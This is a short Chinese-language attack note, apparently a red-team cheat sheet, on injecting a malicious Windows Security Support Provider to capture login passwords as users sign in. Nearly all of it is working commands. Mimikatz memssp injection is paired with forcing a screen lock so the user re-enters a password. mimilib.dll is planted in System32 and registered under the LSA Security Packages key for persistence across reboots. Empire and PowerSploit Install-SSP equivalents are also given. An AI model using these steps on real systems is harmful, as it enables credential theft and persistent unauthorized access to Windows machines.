注入SSP被动收集密码
Mimikatz
重启失效
>privilege::debug
>misc::memssp
锁屏
>rundll32.exe user32.dll,LockWorkStation
data:image/s3,"s3://crabby-images/6133b/6133b05304092e5b94571f5810c75de8478f8393" alt="image"
登录的账号密码保存在
C:\Windows\System32\mimilsa.log
data:image/s3,"s3://crabby-images/d0521/d0521d7afa687aa0725612ea1fb8c9e84763df2f" alt="image"
重启有效
将mimikatz中的mimilib.dll放入system32目录
>reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" 查看注册表
>reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ 添加mimilib
data:image/s3,"s3://crabby-images/36895/368957135e24a024bc75dc38575b3ac7a1329ee8" alt="image"
有账号登录密码保存在C:\Windows\System32\kiwissp.log重启也有效
data:image/s3,"s3://crabby-images/4e63b/4e63b5e3aec25c798b690f1541ccbdc0ac9442e9" alt="image"
Empire
复制mimilib.dll到system32文件夹中
>shell copy mimilib.dll C:\Windows\System32\
使用模块
>usemodule persistence/misc/install_ssp*
>set Path C:\Users\Administrator\mimilib.dll
Powersploit
>Import-Module .\PowerSploit.psm1
>Install-SSP -Path .\mimilib.dll